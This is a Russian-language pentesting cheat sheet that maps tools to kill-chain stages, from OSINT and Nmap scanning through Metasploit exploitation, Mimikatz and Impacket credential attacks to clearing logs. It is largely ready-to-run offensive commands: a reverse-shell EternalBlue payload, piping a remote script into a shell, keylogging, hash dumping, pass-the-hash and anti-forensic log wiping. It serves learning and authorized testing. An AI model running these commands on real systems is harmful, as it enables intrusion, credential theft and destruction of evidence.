🔍
📌 Шпаргалка #04

Арсенал пентестера: все инструменты от разведки до закрепления

✍️ pentestudy 📅 28.03.2026

📌 Что это / Зачем это нужно

Пентест — это не один инструмент, а цепочка этапов, где каждый инструмент решает свою задачу. Как в военной операции: сначала спутниковая разведка, потом анализ слабых мест, потом удар, потом работа десанта внутри.

Эта шпаргалка — полная карта арсенала, расставленная в логическом порядке: от первого контакта с целью до полного контроля и заметания следов. Каждый инструмент — с аналогией, назначением и примерами команд.

⚡ Общая схема атаки (Kill Chain)

  1. Пассивная разведка (OSINT) — собираем информацию не касаясь цели
  2. Активная разведка (сканирование) — сканируем цель, находим порты и сервисы
  3. Анализ уязвимостей — определяем слабые места
  4. Эксплуатация — пробиваем защиту, получаем доступ
  5. Пост-эксплуатация — закрепляемся, собираем данные, двигаемся по сети
  6. Атаки на пароли — ломаем хэши, брутфорсим сервисы
  7. Атаки на веб-приложения — отдельная ветка, свои инструменты
  8. Атаки на Active Directory — корпоративные сети Windows
  9. Заметание следов — чистим логи, убираем артефакты

Ниже — инструменты по каждому этапу.

🔍 Этап 1: Пассивная разведка (OSINT)

Собираем всё что можно не прикасаясь к цели. Цель не знает что её изучают.

Аналогия: изучаешь здание через Google Maps, читаешь о нём в новостях, смотришь кто там работает через LinkedIn — но даже не подходишь к нему.

theHarvester

Что это: сборщик email-адресов, поддоменов, IP-адресов и имён сотрудников из открытых источников (Google, Bing, LinkedIn, Shodan, crt.sh).

Аналогия: шпион, который читает газеты, телефонные справочники и корпоративные отчёты, не выходя из офиса.

Зачем: получить список email-ов для фишинга, найти поддомены (забытый dev.company.com может быть дырявым), узнать IP-диапазоны.

# Собрать email и поддомены компании
theHarvester -d company.com -b google,bing,linkedin -l 200
 
# Только поддомены через crt.sh
theHarvester -d company.com -b crtsh

Дополняет: результаты передаёшь в Nmap (IP-адреса) и в инструменты фишинга (email-ы).

Maltego

Что это: визуальный OSINT-инструмент для построения связей между людьми, доменами, IP, email, соцсетями, компаниями. Рисует граф взаимосвязей.

Аналогия: детективная доска с фотографиями, нитками и кнопками. Как в кино, когда следователь связывает подозреваемых, адреса и события.

Зачем: увидеть полную картину: кто связан с кем, какие домены принадлежат компании, какие серверы за ними стоят, кто администрирует.

# GUI-инструмент, запуск:
maltego
# Работа через "трансформы" — автоматические запросы к источникам данных
# Вводишь домен → получаешь граф: поддомены, IP, email, люди, технологии

Дополняет: даёт стратегическую картину перед началом активного сканирования.

Sherlock / Maigret

Что это: поиск аккаунтов по никнейму на сотнях платформ.

Аналогия: частный детектив, который по одному псевдониму находит все профили человека в интернете.

Зачем: деанон. Нашёл никнейм админа → нашёл его GitHub, Twitter, форумы → нашёл email → нашёл реальное имя.

# Sherlock — быстрый поиск
sherlock username
 
# Maigret — более глубокий поиск (больше сайтов)
maigret username

Дополняет: работает в связке с theHarvester и Maltego для построения полного профиля цели.

Shodan

Что это: поисковик по устройствам, подключённым к интернету. Сканирует весь интернет и индексирует открытые порты, сервисы, баннеры.

Аналогия: Google, но не для сайтов, а для серверов, камер, роутеров, промышленных систем. Показывает что торчит наружу.

Зачем: найти открытые сервисы цели без сканирования (пассивно), обнаружить забытые серверы, IoT-устройства, дефолтные пароли на камерах.

# CLI-поиск (нужен API-ключ)
shodan search "hostname:company.com"
 
# Поиск уязвимых сервисов
shodan search "Apache 2.4.49"   # известная RCE-уязвимость
 
# Информация по IP
shodan host 1.2.3.4
 
# Или через веб: shodan.io

Дополняет: альтернатива активному сканированию Nmap. Не оставляет следов на цели.

🎯 Этап 2: Активная разведка (сканирование)

Теперь трогаем цель — отправляем пакеты, сканируем порты, определяем сервисы. Цель может это заметить в логах.

Аналогия: подошёл к зданию, обошёл по периметру, подёргал двери, заглянул в окна. Охрана может заметить.

Nmap

Что это: король сетевых сканеров. Находит открытые порты, определяет сервисы и их версии, ОС, запускает скрипты для детекции уязвимостей.

Аналогия: спутниковая разведка + разведгруппа в одном. Показывает полную карту объекта: все входы, что за каждой дверью, какие замки.

Зачем: первый шаг активной разведки. Без Nmap ты слепой — не знаешь что открыто и что работает на цели.

# Быстрое сканирование — найти открытые порты
nmap -sV 192.168.1.10
 
# Полное сканирование всех портов + ОС + скрипты
nmap -A -p- 192.168.1.10
 
# Скрытное SYN-сканирование (меньше палится в логах)
nmap -sS -T2 192.168.1.10
 
# Сканирование подсети
nmap -sn 192.168.1.0/24
 
# Скрипты для поиска уязвимостей
nmap --script vuln 192.168.1.10
 
# Сохранить результат
nmap -A -oN scan_result.txt 192.168.1.10

Ключевые флаги:

  • -sS — SYN-скан (скрытный, не завершает TCP-хендшейк)
  • -sV — определение версий сервисов
  • -O — определение ОС
  • -A — агрессивный скан (версии + ОС + скрипты + трассировка)
  • -p- — все 65535 портов
  • -T0..T5 — скорость (T0 = параноидально медленный, T5 = безумно быстрый)
  • --script — NSE-скрипты (vuln, exploit, brute, discovery)

Дополняет: результаты Nmap → в Nessus (для детального анализа уязвимостей) → в Metasploit (для эксплуатации).

Masscan

Что это: сверхбыстрый сканер портов. Может просканировать весь интернет за 6 минут.

Аналогия: если Nmap — снайпер (точный, детальный), то Masscan — ковровая бомбардировка (быстро, но грубо).

Зачем: когда нужно просканировать огромный диапазон IP на конкретные порты. Сначала Masscan находит что открыто, потом Nmap детально изучает найденное.

# Сканирование подсети на порты 80, 443, 8080
masscan 192.168.1.0/24 -p80,443,8080 --rate=1000
 
# Результат в Nmap-совместимом формате
masscan 10.0.0.0/8 -p445 --rate=10000 -oL smb_hosts.txt

Дополняет: Masscan (быстро найти) → Nmap (детально изучить).

Enum4linux / enum4linux-ng

Что это: инструмент для перечисления информации из Windows/Samba-систем через SMB/NetBIOS.

Аналогия: подошёл к проходной и спросил: «Кто тут работает? Какие отделы есть? Какие папки общие?» — и получил ответы, потому что секретарь не спрашивает удостоверение.

Зачем: вытянуть из Windows-машин списки пользователей, групп, сетевых шар, политики паролей — без аутентификации (если SMB настроен небезопасно).

# Полное перечисление
enum4linux -a 192.168.1.10
 
# Только пользователи
enum4linux -U 192.168.1.10
 
# enum4linux-ng (улучшенная версия)
enum4linux-ng -A 192.168.1.10

Дополняет: данные передаёшь в Hydra (брутфорс найденных пользователей) или в BloodHound (атаки на AD).

🛡 Этап 3: Анализ уязвимостей

Знаем что открыто — теперь ищем конкретные дыры с CVE-номерами и рейтингом критичности.

Аналогия: инспектор проверяет каждый замок, каждое окно, каждую систему сигнализации и составляет отчёт: «вот тут можно пролезть».

Nessus

Что это: профессиональный сканер уязвимостей от Tenable. Проверяет системы по базе из десятков тысяч известных уязвимостей.

Аналогия: аналитический центр разведки. Получает данные о цели и выдаёт детальный отчёт: что уязвимо, насколько критично (CVSS-оценка), как починить.

Зачем: получить список реальных уязвимостей с CVE-номерами. Без этого ты тыкаешь вслепую в Metasploit.

# Веб-интерфейс: https://localhost:8834
# Бесплатная версия: Nessus Essentials (до 16 IP)
# Создаёшь скан → указываешь цели → запускаешь → получаешь отчёт
 
# Отчёт показывает:
# - CVE-номер уязвимости
# - CVSS-оценку (0-10)
# - Описание и рекомендации по исправлению
# - Ссылку на эксплойт (если есть)

Дополняет: Nmap (найти что открыто) → Nessus (найти уязвимости) → Metasploit (эксплуатировать).

OpenVAS (Greenbone)

Что это: бесплатная open-source альтернатива Nessus. Тот же принцип — сканирование на уязвимости.

Аналогия: тот же аналитический центр, но бесплатный и с меньшим бюджетом. Работает хорошо, но интерфейс и скорость уступают Nessus.

Зачем: когда нужен сканер уязвимостей, но платить за Nessus не хочешь.

# Установка через Docker
docker run -d -p 443:443 --name openvas greenbone/openvas
 
# Веб-интерфейс: https://localhost
# Логин по умолчанию: admin / admin

Дополняет: замена Nessus для тех, кому нужен бесплатный вариант.

Nikto

Что это: сканер веб-серверов. Проверяет на известные уязвимости, опасные конфигурации, дефолтные файлы и директории.

Аналогия: инспектор, который проверяет только двери веб-сервера: «дефолтный пароль на админке? конфигурационные файлы торчат наружу? phpinfo() доступен?»

Зачем: быстрая проверка веб-сервера на очевидные косяки перед глубоким анализом через Burp Suite.

# Базовое сканирование
nikto -h http://192.168.1.10
 
# С указанием порта
nikto -h http://192.168.1.10:8080
 
# Сохранить отчёт
nikto -h http://192.168.1.10 -o report.html -Format htm

Дополняет: Nikto (быстрая проверка веба) → Burp Suite (глубокий анализ).

🚀 Этап 4: Эксплуатация

Нашли дыры — теперь пробиваем защиту. Подбираем эксплойт, выбираем payload, получаем доступ.

Аналогия: ракетный командный центр. Выбираешь ракету (эксплойт) под тип цели, заряжаешь боеголовку (payload), наводишь (RHOSTS/LHOST), запускаешь.

Metasploit Framework

Что это: главный фреймворк для эксплуатации. Тысячи готовых эксплойтов, сотни payload-ов, модули разведки, пост-эксплуатации — всё в одной консоли.

Аналогия: ракетный командный центр с арсеналом. Склад ракет (эксплойтов), склад боеголовок (payload-ов), пусковая установка (handler), система наведения (настройки), десантные модули (post).

Зачем: эксплуатация известных уязвимостей. Если Nessus нашёл CVE — ищешь эксплойт в Metasploit и используешь.

# Запуск
msfconsole
 
# Поиск эксплойта по CVE
search cve:2017-0144
 
# Или по ключевому слову
search eternalblue
 
# Использовать эксплойт
use exploit/windows/smb/ms17_010_eternalblue
 
# Посмотреть параметры
show options
 
# Настроить
set RHOSTS 192.168.1.10        # цель
set LHOST 192.168.1.5          # твой IP
set LPORT 4444                  # твой порт
set payload windows/x64/meterpreter/reverse_tcp
 
# Запуск
run

Ключевые модули:

  • exploit/ — эксплойты (пробивают уязвимость)
  • payload/ — полезная нагрузка (что выполняется после)
  • auxiliary/ — вспомогательные (сканеры, брутфорсеры, фаззеры)
  • post/ — пост-эксплуатация (сбор данных, закрепление)
  • encoder/ — обфускация payload для обхода антивирусов

Дополняет: Nmap + Nessus → Metasploit → Meterpreter (пост-эксплуатация).

searchsploit / Exploit-DB

Что это: локальная база эксплойтов из Exploit-DB. Ищет эксплойты по имени сервиса, CVE, версии — без интернета.

Аналогия: каталог оружия. Знаешь модель замка (версию софта) — находишь подходящую отмычку.

Зачем: когда в Metasploit нет эксплойта — ищешь в searchsploit. Там могут быть PoC-скрипты на Python, C, Ruby.

# Поиск по имени сервиса
searchsploit apache 2.4.49
 
# Поиск по CVE
searchsploit CVE-2021-41773
 
# Скопировать эксплойт в текущую папку
searchsploit -m 50383
 
# Обновить базу
searchsploit -u

Дополняет: запасной арсенал, когда в Metasploit нужного эксплойта нет.

🔧 Этап 5: Пост-эксплуатация

Мы внутри. Теперь нужно закрепиться, собрать данные и двигаться дальше по сети.

Аналогия: десантная группа высадилась. Теперь разведка внутри здания, установка жучков, поиск документов, открытие дверей в другие отделы.

Meterpreter (часть Metasploit)

Что это: продвинутая оболочка, которая работает в памяти целевой машины. Не создаёт файлов на диске — сложнее обнаружить.

Аналогия: десантная группа с полным снаряжением. Не просто стоят внутри — у них камеры, отмычки, рации, взрывчатка для сейфов.

Зачем: после эксплуатации — полный контроль: файлы, скриншоты, камера, кейлоггер, дамп паролей, миграция между процессами.

# После успешной эксплуатации ты в meterpreter >
 
sysinfo                    # информация о системе
getuid                     # текущий пользователь
getsystem                  # попытка повысить привилегии до SYSTEM
hashdump                   # дамп хэшей паролей
screenshot                 # скриншот экрана
keyscan_start              # запуск кейлоггера
keyscan_dump               # прочитать нажатия клавиш
download C:\\secrets.txt    # скачать файл
upload backdoor.exe C:\\   # загрузить файл
shell                      # обычный cmd/bash терминал
ps                         # список процессов
migrate 1234               # мигрировать в другой процесс
run post/windows/gather/credentials/credential_collector

Дополняет: Metasploit (попал внутрь) → Meterpreter (работаешь внутри).

LinPEAS / WinPEAS

Что это: скрипты для автоматического поиска путей повышения привилегий на Linux (LinPEAS) и Windows (WinPEAS).

Аналогия: собака-ищейка внутри здания. Бегает по всем этажам и помечает: «тут дверь без замка», «тут ключ от сейфа лежит под ковриком», «тут можно пролезть в вентиляцию».

Зачем: после получения shell ты часто обычный пользователь. Нужно стать root/SYSTEM. PEAS-скрипты автоматически находят: SUID-бинари, cron-задачи от root, writable-файлы, слабые разрешения, токены, пароли в конфигах.

# На цели (Linux):
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
 
# Или загрузить через meterpreter:
upload linpeas.sh /tmp/
shell
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh
 
# Windows:
upload winPEAS.exe C:\\Temp\\
shell
C:\Temp\winPEAS.exe

Дополняет: Meterpreter (попал внутрь как обычный юзер) → LinPEAS/WinPEAS (нашёл путь к root) → повышение привилегий.

Mimikatz

Что это: инструмент для извлечения паролей, хэшей, Kerberos-тикетов и PIN-кодов из памяти Windows.

Аналогия: взломщик сейфов, который не ломает сейф, а читает комбинацию из записки, приклеенной на мониторе. Windows хранит пароли/хэши в памяти — Mimikatz их оттуда вытаскивает.

Зачем: получить пароли и хэши для доступа к другим машинам в сети (lateral movement). Один хэш доменного админа — и вся сеть твоя.

# Через meterpreter:
load kiwi
creds_all              # все учётные данные из памяти
 
# Или напрямую на машине:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords     # пароли в открытом виде
sekurlsa::wdigest            # wdigest-пароли
lsadump::sam                 # дамп SAM-базы
kerberos::list               # Kerberos-тикеты

Дополняет: Meterpreter (доступ к машине) → Mimikatz (извлечь пароли) → использовать для доступа к другим машинам.

Cobalt Strike / Sliver

Что это: C2-фреймворки (Command & Control). Профессиональные платформы для управления множеством взломанных машин, с продвинутым обходом антивирусов.

Аналогия: если Metasploit — ракетный командный центр, то Cobalt Strike — это штаб генерала, который управляет множеством десантных групп на разных объектах одновременно. Шифрованные каналы связи, смена позывных, маскировка под легитимный трафик.

Зачем: реальные red team операции в корпоративных сетях. Когда нужно управлять 50+ взломанными машинами, обходить EDR, маскировать трафик.

  • Cobalt Strike — коммерческий ($5,900/год), стандарт индустрии red team
  • Sliver — бесплатный open-source аналог от BishopFox
# Sliver (бесплатный)
sliver-server                # запуск сервера
generate --mtls --os windows  # создать имплант
mtls --lhost 10.0.0.1        # запустить listener
sessions                     # список активных сессий
use SESSION_ID               # управлять машиной

Дополняет: замена Metasploit для продвинутых операций, когда нужен стелс и управление множеством целей.

🔑 Этап 6: Атаки на пароли

Отдельная ветка — ломаем пароли и хэши на всех этапах.

Аналогия: слесарная мастерская. Подбираешь ключи, делаешь дубликаты, ломаешь замки перебором.

Hydra

Что это: онлайн-брутфорсер. Перебирает пароли напрямую к сервисам: SSH, FTP, HTTP, RDP, SMB, базы данных.

Аналогия: робот, который стоит у двери и пробует ключи один за другим с бешеной скоростью.

Зачем: когда знаешь логин (нашёл через enum4linux или theHarvester) и хочешь подобрать пароль к живому сервису.

# Брутфорс SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
 
# Брутфорс FTP
hydra -L users.txt -P passwords.txt ftp://192.168.1.10
 
# Брутфорс HTTP-формы
hydra -l admin -P rockyou.txt 192.168.1.10 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid credentials"
 
# Брутфорс RDP
hydra -l administrator -P rockyou.txt rdp://192.168.1.10

Дополняет: enum4linux (нашёл пользователей) → Hydra (подобрал пароли).

Hashcat

Что это: офлайн-взломщик хэшей. Использует GPU для перебора — в десятки раз быстрее CPU.

Аналогия: суперкомпьютер для подбора комбинаций к сейфу. Работает не с живым сервисом, а с украденным хэшем — можно перебирать миллиарды вариантов в секунду.

Зачем: когда через Mimikatz или hashdump получил хэши паролей — нужно восстановить из них пароли в открытом виде.

# NTLM хэш (Windows)
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
 
# MD5
hashcat -m 0 hash.txt rockyou.txt
 
# С правилами (мутации: добавить цифры, заглавные и т.д.)
hashcat -m 1000 hash.txt rockyou.txt -r rules/best64.rule
 
# Показать взломанные
hashcat -m 1000 hash.txt --show

Основные режимы (-m):

  • 0 — MD5
  • 100 — SHA1
  • 1000 — NTLM (Windows)
  • 1800 — SHA-512 (Linux /etc/shadow)
  • 3200 — bcrypt
  • 13100 — Kerberoasting (TGS)

Дополняет: Mimikatz/hashdump (извлечь хэши) → Hashcat (взломать) → использовать пароли.

John the Ripper

Что это: ещё один офлайн-взломщик хэшей. Старше Hashcat, работает на CPU, поддерживает больше экзотических форматов.

Аналогия: ветеран-слесарь. Медленнее чем Hashcat, но знает больше типов замков.

Зачем: когда Hashcat не распознаёт формат хэша или нужно работать без GPU.

# Автоопределение формата
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
 
# Конкретный формат
john --format=raw-md5 hash.txt --wordlist=rockyou.txt
 
# Показать взломанные
john --show hash.txt
 
# Извлечь хэши из файлов
zip2john archive.zip > zip_hash.txt
john zip_hash.txt --wordlist=rockyou.txt

Дополняет: альтернатива Hashcat, особенно для экзотических форматов (zip, pdf, ssh keys, keepass).

🌐 Этап 7: Атаки на веб-приложения

Веб — отдельный мир со своими инструментами. Большинство современных целей — это веб-приложения.

Аналогия: если сетевые атаки — это штурм здания, то веб-атаки — это обман через приёмную. Заполняешь формы с «неправильными» данными и ломаешь логику.

Burp Suite

Что это: главный инструмент для тестирования веб-приложений. Перехватывает HTTP-запросы, модифицирует их, автоматизирует атаки.

Аналогия: рентгеновский аппарат + лаборатория для веб-трафика. Видишь каждый запрос между браузером и сервером, можешь изменить любой байт и отправить заново.

Зачем: искать SQL-инъекции, XSS, IDOR, broken auth, SSRF и другие веб-уязвимости.

# GUI-инструмент, запуск:
burpsuite
 
# Основные вкладки:
# Proxy — перехват и модификация запросов в реальном времени
# Repeater — отправка модифицированных запросов вручную
# Intruder — автоматический перебор параметров (брутфорс, фаззинг)
# Scanner — автоматический поиск уязвимостей (платная версия)
# Decoder — кодирование/декодирование (Base64, URL, HTML)

Бесплатная версия (Community): Proxy + Repeater + Decoder. Для начала хватит. Платная версия (Pro): + Scanner + быстрый Intruder. ~$449/год.

Дополняет: Nikto (быстрая проверка) → Burp Suite (глубокий ручной анализ).

Gobuster / Feroxbuster / ffuf

Что это: инструменты для перебора директорий и файлов на веб-сервере (directory brute-forcing).

Аналогия: обходишь все двери в коридоре и дёргаешь ручки. /admin, /backup, /config, /.git — может что-то открыто?

Зачем: найти скрытые страницы, панели администрирования, забытые бэкапы, открытые конфиг-файлы.

# Gobuster — перебор директорий
gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt
 
# С расширениями файлов
gobuster dir -u http://192.168.1.10 -w common.txt -x php,txt,bak,old
 
# ffuf — быстрый фаззер (более гибкий)
ffuf -u http://192.168.1.10/FUZZ -w common.txt
 
# Feroxbuster — рекурсивный перебор
feroxbuster -u http://192.168.1.10 -w common.txt

Дополняет: Nmap (нашёл веб-сервер на порту 80/443) → Gobuster (нашёл скрытые страницы) → Burp Suite (проверил на уязвимости).

SQLmap

Что это: автоматизированный инструмент для эксплуатации SQL-инъекций.

Аналогия: робот-взломщик, специализирующийся на одном типе замков — SQL-базах данных. Находит SQL-инъекцию и автоматически вытаскивает все данные.

Зачем: если нашёл потенциальную SQL-инъекцию (через Burp Suite или вручную) — SQLmap автоматически подтвердит её и выкачает базу.

# Проверить URL на SQLi
sqlmap -u "http://site.com/page?id=1" --dbs
 
# Из перехваченного запроса в Burp (сохранить в файл)
sqlmap -r request.txt --dbs
 
# Вытащить таблицы
sqlmap -u "http://site.com/page?id=1" -D database_name --tables
 
# Вытащить данные
sqlmap -u "http://site.com/page?id=1" -D database_name -T users --dump
 
# Попробовать получить shell
sqlmap -u "http://site.com/page?id=1" --os-shell

Дополняет: Burp Suite (нашёл SQLi) → SQLmap (автоматически эксплуатировал и вытащил данные).

🏢 Этап 8: Атаки на Active Directory

Корпоративные Windows-сети — отдельная дисциплина. AD — это святой грааль: получил доменного админа — контролируешь всё.

Аналогия: вместо штурма одного здания — захват целого города с централизованным управлением.

BloodHound

Что это: инструмент для визуализации и анализа связей в Active Directory. Строит граф: пользователи, группы, машины, права — и находит пути от обычного юзера до доменного админа.

Аналогия: карта города с отмеченными маршрутами: «от твоего текущего положения до мэрии можно добраться через: склад → пожарную станцию → мэрию». Показывает кратчайший путь к Domain Admin.

Зачем: в AD сотни пользователей и групп, вручную найти путь повышения привилегий невозможно. BloodHound делает это автоматически.

# 1. Собрать данные (на целевой машине):
# SharpHound.exe (Windows) или bloodhound-python (Linux)
bloodhound-python -u user -p password -d domain.local -c All
 
# 2. Запустить BloodHound (на Kali):
neo4j start
bloodhound
 
# 3. Загрузить собранные данные (ZIP-файл)
# 4. Запросы:
#    "Shortest path to Domain Admin"
#    "Find all Kerberoastable users"
#    "Users with DCSync rights"

Дополняет: Mimikatz (получить первые креды) → BloodHound (найти путь к DA) → эксплуатация пути.

Impacket

Что это: коллекция Python-скриптов для работы с сетевыми протоколами Windows: SMB, WMI, Kerberos, LDAP, MSSQL.

Аналогия: набор универсальных ключей и отмычек для всех дверей в Windows-городе. Каждый скрипт — для своего типа двери.

Зачем: перемещение по сети (lateral movement), удалённое выполнение команд, атаки на Kerberos, дамп паролей.

# Удалённое выполнение команд через SMB
impacket-psexec domain/admin:password@192.168.1.10
 
# Через WMI (тише, меньше логов)
impacket-wmiexec domain/admin:password@192.168.1.10
 
# Pass-the-hash (без знания пароля, только хэш)
impacket-psexec -hashes :NTLM_HASH domain/admin@192.168.1.10
 
# Kerberoasting (извлечь TGS-хэши для офлайн-взлома)
impacket-GetUserSPNs domain/user:password -dc-ip 192.168.1.1 -request
 
# DCSync (дамп всех хэшей из домена — нужны права)
impacket-secretsdump domain/admin:password@192.168.1.1

Дополняет: BloodHound (нашёл путь) → Impacket (выполнил атаку) → Mimikatz (собрал ещё креды) → повторить.

Responder

Что это: инструмент для перехвата аутентификации в Windows-сетях. Отравляет LLMNR/NBT-NS/mDNS запросы и собирает NTLMv2-хэши.

Аналогия: мошенник в корпоративном здании. Когда кто-то кричит «где тут бухгалтерия?» (LLMNR-запрос), он отвечает «я бухгалтерия, покажи удостоверение» — и записывает его.

Зачем: пассивно собирать хэши паролей в корпоративной сети. Часто один из первых шагов при внутреннем пентесте.

# Запуск (нужно быть в одной сети с целями)
responder -I eth0 -dwv
 
# Собранные хэши будут в /usr/share/responder/logs/
# Дальше — в Hashcat для взлома:
hashcat -m 5600 hashes.txt rockyou.txt

Дополняет: Responder (собрал хэши) → Hashcat (взломал) → Impacket (зашёл на машину с паролем).

🧹 Этап 9: Заметание следов

После работы — убираем за собой. В реальном пентесте это часть отчёта. В нелегальном хакинге — обязательный этап.

Аналогия: уборщик после операции. Стирает отпечатки, убирает инструменты, восстанавливает обстановку.

Что чистить

# Linux — основные логи:
/var/log/auth.log          # SSH-логины
/var/log/syslog            # системные события
/var/log/apache2/access.log # веб-запросы
~/.bash_history             # история команд
 
# Очистить историю команд:
history -c && history -w
unset HISTFILE
 
# Windows:
wevtutil cl Security        # лог безопасности
wevtutil cl System           # системный лог
wevtutil cl Application      # лог приложений
 
# Через meterpreter:
clearev                      # очистить Event Log
timestomp file.exe -m "01/01/2020 00:00:00"  # изменить дату файла

Важно

Если на цели стоит ELK/SIEM — логи уже ушли на отдельный сервер. Чистить локальные логи бесполезно. Именно поэтому SIEM так важен для blue team.

🧠 Полная цепочка инструментов (сводка)

Пассивная разведка: theHarvester → Maltego → Sherlock/Maigret → Shodan

Активная разведка: Masscan (быстро) → Nmap (детально) → Enum4linux (Windows/SMB)

Анализ уязвимостей: Nessus / OpenVAS (сетевые) → Nikto (веб)

Эксплуатация: Metasploit + searchsploit (запасной арсенал)

Пост-эксплуатация: Meterpreter → LinPEAS/WinPEAS (privesc) → Mimikatz (пароли)

Пароли: Hydra (онлайн) → Hashcat / John (офлайн)

Веб: Gobuster/ffuf (директории) → Burp Suite (анализ) → SQLmap (SQLi)

Active Directory: Responder (хэши) → BloodHound (путь к DA) → Impacket (lateral movement)

C2 / продвинутые: Cobalt Strike / Sliver

Следы: clearev, history -c, wevtutil

⚠️ Важные моменты

  • Ни один инструмент не заменяет понимание. Metasploit без знания сетей — это обезьяна с гранатой. Учи основы: TCP/IP, DNS, HTTP, Active Directory
  • Порядок важен. Нельзя эксплуатировать, не просканировав. Нельзя сканировать, не разведав. Каждый этап строится на результатах предыдущего
  • Автоматизация не заменяет ручную работу. Сканеры находят 80% уязвимостей. Оставшиеся 20% — ручной анализ через Burp Suite, кастомные скрипты, логика
  • Всё что ты делаешь — логируется. Если на цели стоит IDS, SIEM, EDR — каждый твой скан, каждый эксплойт, каждый брутфорс виден. Учитывай это
  • Легальный пентест = письменное разрешение. Без договора с заказчиком все эти инструменты — уголовное преступление. Тренируйся в лабе: HackTheBox, TryHackMe, свой Metasploitable
  • Обновляй инструменты. Новые CVE выходят каждый день. apt update && apt upgrade в Kali — регулярно
  • Wordlists решают. rockyou.txt — стандарт, но для серьёзных целей нужны кастомные словари. Генерируй через cewl (из сайта цели) или crunch
Содержание
📌 Что это / Зачем это нужно ⚡ Общая схема атаки (Kill Chain) 🔍 Этап 1: Пассивная разведка (OSINT) theHarvester Maltego Sherlock / Maigret Shodan 🎯 Этап 2: Активная разведка (сканирование) Nmap Masscan Enum4linux / enum4linux-ng 🛡 Этап 3: Анализ уязвимостей Nessus OpenVAS (Greenbone) Nikto 🚀 Этап 4: Эксплуатация Metasploit Framework searchsploit / Exploit-DB 🔧 Этап 5: Пост-эксплуатация Meterpreter (часть Metasploit) LinPEAS / WinPEAS Mimikatz Cobalt Strike / Sliver 🔑 Этап 6: Атаки на пароли Hydra Hashcat John the Ripper 🌐 Этап 7: Атаки на веб-приложения Burp Suite Gobuster / Feroxbuster / ffuf SQLmap 🏢 Этап 8: Атаки на Active Directory BloodHound Impacket Responder 🧹 Этап 9: Заметание следов Что чистить Важно 🧠 Полная цепочка инструментов (сводка) ⚠️ Важные моменты